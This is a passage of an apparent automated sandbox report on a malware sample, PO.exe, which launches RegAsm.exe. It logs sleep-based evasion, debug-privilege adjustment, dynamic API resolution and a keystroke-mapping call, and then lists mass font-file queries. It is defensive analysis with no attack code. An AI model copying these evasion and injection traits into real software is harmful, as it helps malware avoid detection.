                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596837Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595817Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595576Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593903Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7998Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1848Jump to behavior
                Source: C:\Users\user\Desktop\PO.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7976Thread sleep count: 7998 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7976Thread sleep count: 1848 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599342s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599182s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -599076s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598755s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598620s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -598062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597950s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597390s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -597062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596837s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596499s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595943s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595817s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595576s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -595015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594796s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594468s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -594031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -593903s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7972Thread sleep time: -593781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599342Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599182Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599076Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598755Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598620Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597950Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596837Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595817Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595576Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593903Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593781Jump to behavior
                Source: RegAsm.exe, 00000002.00000002.4145529270.0000000000B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FC168 LdrInitializeThunk,LdrInitializeThunk,2_2_026FC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.PO.exe.24f2724.1.raw.unpack, EngineAlgorithm.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 0.2.PO.exe.24f2724.1.raw.unpack, EngineAlgorithm.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 0.2.PO.exe.352e220.4.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Users\user\Desktop\PO.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
